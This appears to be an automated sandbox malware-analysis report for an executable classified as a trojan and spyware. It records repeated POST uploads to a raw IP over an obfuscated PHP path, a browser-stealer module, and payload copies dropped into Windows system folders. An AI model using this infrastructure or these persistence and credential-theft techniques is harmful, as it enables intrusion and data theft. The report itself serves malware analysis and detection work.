                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2592Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2592Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2192Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2192Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2164Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2592Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 2584Expect: 100-continue
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                          Source: powershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000001.00000002.1900716755.0000026100227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1942628864.000002023656E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1906560868.0000013580227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1921237248.00000202DADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1924984491.000001AD03707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1942796990.000002849F157000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1935689556.00000227B42C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1936385377.0000026F303F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1920581928.000001DB55947000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1899802364.0000018980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1920142698.000002AD24347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: 3XtEci4Mmo.exe, 00000000.00000002.1788927246.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1900716755.0000026100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1942628864.00000202361C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1906560868.0000013580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1921237248.00000202DABB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1924984491.000001AD034F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1942796990.000002849EF31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1935689556.00000227B40A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1936385377.0000026F301D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1920581928.000001DB55721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1899802364.0000018980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1920142698.000002AD24121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1936183069.000001E32E342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1900716755.0000026100227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1942628864.000002023656E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1906560868.0000013580227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1921237248.00000202DADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1924984491.000001AD03707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1942796990.000002849F157000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1935689556.00000227B42C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1936385377.0000026F303F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1920581928.000001DB55947000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1899802364.0000018980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1920142698.000002AD24347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000001.00000002.1900716755.0000026100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1942628864.00000202361C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1906560868.0000013580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1921237248.00000202DABB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1924984491.000001AD034F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1942796990.000002849EF31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1935689556.00000227B40A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1936385377.0000026F301D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1920581928.000001DB55721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1899802364.0000018980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1920142698.000002AD24121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1936183069.000001E32E342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000054.00000003.2651347076.00000241EDAC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA72000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000054.00000003.2651347076.00000241EDA0E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000054.00000003.2651347076.00000241EDAC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000054.00000003.2651347076.00000241EDAA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000054.00000003.2651347076.00000241EDB07000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000054.00000003.2651347076.00000241EDAF4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000054.00000003.2651347076.00000241EDAE8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000054.00000003.2651347076.00000241EDAC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: svchost.exe, 00000054.00000003.2651347076.00000241EDAC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.dr | String found in binary or memory: https://www.ecosia.org/newtab/
Source: it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Window created: window name: CLIPBRDWNDCLASS
Source: powershell.exe | Process created: 44
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Windows\INF\.NET CLR Data\78fe9fe6f28b21
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Code function: 0_2_00007FFD9B890D68
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Code function: 0_2_00007FFD9BA55408
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Code function: 0_2_00007FFD9BA533F9
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Code function: 0_2_00007FFD9BA523F5
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Code function: 0_2_00007FFD9BA549B0
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Code function: 0_2_00007FFD9BA408FB
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Code function: 0_2_00007FFD9BA5412A
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Code function: 0_2_00007FFD9BA53828
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Code function: 0_2_00007FFD9BA53EB0
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Code function: 0_2_00007FFD9BA525A8
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Code function: 0_2_00007FFD9BA534D3
Source: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe | Code function: 52_2_00007FFD9B8B0D68
Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\AfaiVEic.log 3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
Source: 3XtEci4Mmo.exe, 00000000.00000000.1677601667.00000000003F8000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 3XtEci4Mmo.exe
Source: 3XtEci4Mmo.exe, 00000000.00000002.1898628878.000000001B649000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs 3XtEci4Mmo.exe
Source: 3XtEci4Mmo.exe, 00000000.00000002.1846719384.0000000013CC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs 3XtEci4Mmo.exe
Source: 3XtEci4Mmo.exe, 00000000.00000002.1846719384.0000000013CEC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs 3XtEci4Mmo.exe
Source: 3XtEci4Mmo.exe, 00000000.00000002.1788307657.0000000002480000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs 3XtEci4Mmo.exe
Source: 3XtEci4Mmo.exe, 00000000.00000002.1893468397.000000001B3F2000.00000002.00000001.01000000.00000000.sdmp | Binary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs 3XtEci4Mmo.exe
Source: 3XtEci4Mmo.exe | Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 3XtEci4Mmo.exe
Source: 3XtEci4Mmo.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 3XtEci4Mmo.exe, r8fuc6TFjfWnUBPl3d1.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 3XtEci4Mmo.exe, r8fuc6TFjfWnUBPl3d1.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 3XtEci4Mmo.exe, r8fuc6TFjfWnUBPl3d1.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 3XtEci4Mmo.exe, r8fuc6TFjfWnUBPl3d1.cs | Cryptographic APIs: 'CreateDecryptor'
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@106/209@0/2
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Users\user\Desktop\OlTNIjCM.log
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8484:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8588:120:WilError_03
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\f56d71433bb0e2fb950c932b49352e3f9208d708a9a063f95da637203ff919b0
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Users\user\AppData\Local\Temp\2zH73PFp52
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BO7Y63UfdW.bat"
Source: 3XtEci4Mmo.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 3XtEci4Mmo.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
